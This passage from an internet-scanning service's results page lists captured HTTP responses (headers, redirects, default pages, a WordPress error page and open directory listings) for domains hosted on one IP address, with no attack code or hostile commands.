    <meta name="viewport" content="width=device-width, initial-scale=1">
    	<link rel="profile" href="https://gmpg.org/xfn/11"> 
    	<title>Tio Pelon &#8211; Tio Pelon Site</title>
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    	<meta name="viewport" content="width=device-width, initial-scale=1.0">
    		<meta name='robots' content='max-image-preview:large, noindex, follow' />
    	<title>WordPress &rsaquo; Error</title>
    	<style type="text/css">
    		html {
    			background: #f1f1f1;
    		}
    		body {
    			background: #fff;
    			border: 1px solid #ccd0d4;
    			color: #444;
    			font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
    			margin: 2em auto;
    			padding: 1em 2em;
    			max-width: 700px;
    			-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);
    			box-shadow: 0 1px 1px rgba(0, 0, 0, .04);
    		}
    		h1 {
    			border-bottom: 1px solid #dadada;
    			clear: both;
    			color: #666;
    			font-size: 24px;
    			margin: 30px 0 0 0;
    			padding: 0;
    			padding-bottom: 7px;
    		}
    		#error-page {
    			margin-top: 50px;
    		}
    		#error-page p,
    		#error-page .wp-die-message {
    			font-size: 14px;
    			line-height: 1.5;
    			margin: 25px 0 20px;
    		}
    		#error-page code {
    			font-family: Consolas, Monaco, monospace;
    		}
    		ul li {
    			margin-bottom: 10px;
    			font-size: 14px ;
    		}
    		a {
    			color: #2271b1;
    		}
    		a:hover,
    		a:active {
    			color: #135e96;
    		}
    		a:focus {
    			color: #043959;
    			box-shadow: 0 0 0 2px #2271b1;
    			outline: 2px solid transparent;
    		}
    		.button {
    			background: #f3f5f6;
    			border: 1px solid #016087;
    			color: #016087;
    			display: inline-block;
    			text-decoration: none;
    			font-size: 13px;
    			line-height: 2;
    			height: 28px;
    			margin: 0;
    			padding: 0 10px 1px;
    			cursor: pointer;
    			-webkit-border-radius: 3px;
    			-webkit-appearance: none;
    			border-radius: 3px;
    			white-space: nowrap;
    			-webkit-box-sizing: border-box;
    			-moz-box-sizing:    border-box;
    			box-sizing:         border-box;
    
    			vertical-align: top;
    		}
    
    		.button.button-large {
    			line-height: 2.30769231;
    			min-height: 32px;
    			padding: 0 12px;
    		}
    
    		.button:hover,
    		.button:focus {
    			background: #f1f1f1;
    		}
    
    		.button:focus {
    			background: #f3f5f6;
    			border-color: #007cba;
    			-webkit-box-shadow: 0 0 0 1px #007cba;
    			box-shadow: 0 0 0 1px #007cba;
    			color: #016087;
    			outline: 2px solid transparent;
    			outline-offset: 0;
    		}
    
    		.button:active {
    			background: #f3f5f6;
    			border-color: #7e8993;
    			-webkit-box-shadow: none;
    			box-shadow: none;
    		}
    
    			</style>
    </head>
    <body id="error-page">
    	<div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body>
    </html>
    	
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.goseguros.devdecimosite2025.com

    2026-01-02 00:59

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 02 Jan 2026 00:59:00 GMT
    server: LiteSpeed
    location: https://www.goseguros.devdecimosite2025.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.carelinkacademy.com

    2026-01-02 00:58

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 02 Jan 2026 00:58:33 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · bestdevicenation.com

    2026-01-02 00:44

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1598
    date: Fri, 02 Jan 2026 00:44:51 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="182461095">2025-09-30 19:38</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="error_log"><a href="/error_log"><img class="icon" src="/_autoindex/assets/icons/file.svg" alt="File">error_log</a></td><td data-sort="1761131958">2025-10-22 11:19</td><td data-sort="2242">      3k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at bestdevicenation.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · blobby.me

    2026-01-02 00:44

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://blobby.me/wp-json/>; rel="https://api.w.org/"
    link: <https://blobby.me/wp-json/wp/v2/pages/9>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://blobby.me/>; rel=shortlink
    etag: "970-1767182561;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 00:44:05 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.tests.devdecimosite2025.com

    2026-01-02 00:42

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 02 Jan 2026 00:42:14 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nexashophub.online

    2026-01-02 00:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 02 Jan 2026 00:33:13 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.panthercoating.com

    2026-01-01 23:37

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://panthercoating.com/
    content-length: 0
    date: Thu, 01 Jan 2026 23:37:15 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · carelinkacademy.com

    2026-01-01 23:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 01 Jan 2026 23:33:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.rawgardenofficialstore.com

    2026-01-01 23:31

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 01 Jan 2026 23:31:53 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.nexashophub.online

    2026-01-01 23:26

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 01 Jan 2026 23:26:27 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.herbglow.cdcit.in

    2026-01-01 22:27

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1605
    date: Thu, 01 Jan 2026 22:27:41 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="185102818">2025-10-31 09:26</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="admin.php"><a href="/admin.php"><img class="icon" src="/_autoindex/assets/icons/file-text.svg" alt="[TXT]">admin.php</a></td><td data-sort="1762763910">2025-11-10 08:38</td><td data-sort="5362">      6k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.herbglow.cdcit.in Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · nexuxtalentpartner.site

    2026-01-01 22:22

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 01 Jan 2026 22:22:39 GMT
    server: LiteSpeed
    location: https://nexuxtalentpartner.site/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.pahesn.org

    2026-01-01 22:12

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-pingback: https://pahesn.org/xmlrpc.php
    x-redirect-by: WordPress
    location: https://pahesn.org/
    x-litespeed-cache: miss
    content-length: 0
    date: Thu, 01 Jan 2026 22:12:39 GMT
    server: LiteSpeed
    referrer-policy: no-referrer-when-downgrade
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · farmaciacolony.com

    2026-01-01 22:06

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 01 Jan 2026 22:06:47 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · paraparappucheithi.com

    2026-01-01 22:01

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://paraparappucheithi.com/wp-json/>; rel="https://api.w.org/"
    etag: "344607-1767173835;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Thu, 01 Jan 2026 22:01:55 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.testnews.cdcit.in

    2026-01-01 21:48

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 01 Jan 2026 21:48:23 GMT
    server: LiteSpeed
    location: https://www.testnews.cdcit.in/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.nexuxtalentpartner.site

    2026-01-01 20:45

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 01 Jan 2026 20:45:38 GMT
    server: LiteSpeed
    location: https://www.nexuxtalentpartner.site/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · bokitas.devdecimosite2025.com

    2026-01-01 20:39

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1157
    date: Thu, 01 Jan 2026 20:39:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at bokitas.devdecimosite2025.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.drsat.net

    2026-01-01 20:10

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://drsat.net/
    x-litespeed-cache: miss
    content-length: 0
    date: Thu, 01 Jan 2026 20:10:45 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · modecart.store

    2026-01-01 20:03

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 01 Jan 2026 20:03:56 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rawgardenofficialstore.com

    2026-01-01 20:00

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Thu, 01 Jan 2026 20:00:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · goseguros.devdecimosite2025.com

    2026-01-01 19:57

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Thu, 01 Jan 2026 19:57:04 GMT
    server: LiteSpeed
    location: https://goseguros.devdecimosite2025.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · aiagora.net

    2026-01-01 19:48

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://aiagora.net/wp-json/>; rel="https://api.w.org/"
    link: <https://aiagora.net/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://aiagora.net/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 804_front,804_URL.6666cd76f96956469e7be39d750cc7d9,804_F,804_Po.10,804_PGS,804_
    etag: "1004-1767296920;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Thu, 01 Jan 2026 19:48:40 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.rwd.ae

    2026-01-01 19:44

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://www.rwd.ae/wp-json/>; rel="https://api.w.org/"
    link: <https://www.rwd.ae/wp-json/wp/v2/pages/330>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://www.rwd.ae/>; rel=shortlink
    transfer-encoding: chunked
    date: Thu, 01 Jan 2026 19:44:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.gigachud.net

    2026-01-01 19:34

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://gigachud.net/
    content-length: 0
    date: Thu, 01 Jan 2026 19:34:54 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-01 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.hijaziparliament.com

    2025-12-31 23:39

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Wed, 31 Dec 2025 23:39:52 GMT
    server: LiteSpeed
    location: https://www.hijaziparliament.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2025-12-31 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.hijaziparliament.com

    2025-12-31 23:39

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://hijaziparliament.com/
    content-length: 0
    date: Wed, 31 Dec 2025 23:39:52 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-31 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · hijaziparliament.com

    2025-12-31 23:39

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Wed, 31 Dec 2025 23:39:52 GMT
    server: LiteSpeed
    location: https://hijaziparliament.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2025-12-31 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · hijaziparliament.com

    2025-12-31 23:39

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    link: <https://hijaziparliament.com/wp-json/>; rel="https://api.w.org/"
    link: <https://hijaziparliament.com/wp-json/wp/v2/pages/1280>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://hijaziparliament.com/>; rel=shortlink
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    cache-control: post-check=0,pre-check=0
    pragma: no-cache
    location: https://hijaziparliament.com/tiehome
    content-length: 44392
    date: Wed, 31 Dec 2025 23:39:52 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: US - 
    
    <!DOCTYPE html>
    <html dir="rtl" lang="ar" class="" data-skin="light" prefix="og: http://ogp.me/ns#">
    <head>
    	<meta charset="UTF-8" />
    	<link rel="profile" href="https://gmpg.org/xfn/11" />
    	<title>US - </title>
    
    <meta http-equiv='x-dns-prefetch-control' content='on'>
    <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' />
    <link rel='dns-prefetch' href='//ajax.googleapis.com' />
    <link rel='dns-prefetch' href='//fonts.googleapis.com' />
    <link rel='dns-prefetch' href='//fonts.gstatic.com' />
    <link rel='dns-prefetch' href='//s.gravatar.com' />
    <link rel='dns-prefetch' href='//www.google-analytics.com' />
    <link rel='preload' as='script' href='https://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js'>
    <meta name='robots' content='index, max-snippet:-1, max-image-preview:large, max-video-preview:-1, follow' />
    <link rel="canonical" href="https://hijaziparliament.com/" />
    <meta name="description" content="الموقع الالكتروني يرحب بكم"><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","@id":"https://hijaziparliament.com/#","name":"","url":"https://hijaziparliament.com","logo":{"@type":"ImageObject","@id":"https://hijaziparliament.com/#logo","inLanguage":"ar"},"description":"","sameAs":["https://x.com/"]}</script><meta property="og:url" content="https://hijaziparliament.com/" /><meta property="og:locale" content="ar" /><meta property="og:type" content="website" /><meta property="og:title" content="US - " /><meta property="og:description" content="الموقع الالكتروني يرحب بكم" /><meta name="twitter:card" content="summary"/><meta name="twitter:locale" content="ar"/><meta name="twitter:title"  content="US - "/><meta name="twitter:description" content="الموقع الالكتروني يرحب بكم"/><meta name="twitter:url" content="https://hijaziparliament.com/"/><link rel="alternate" type="application/rss+xml" title=" &laquo; الخلاصة" 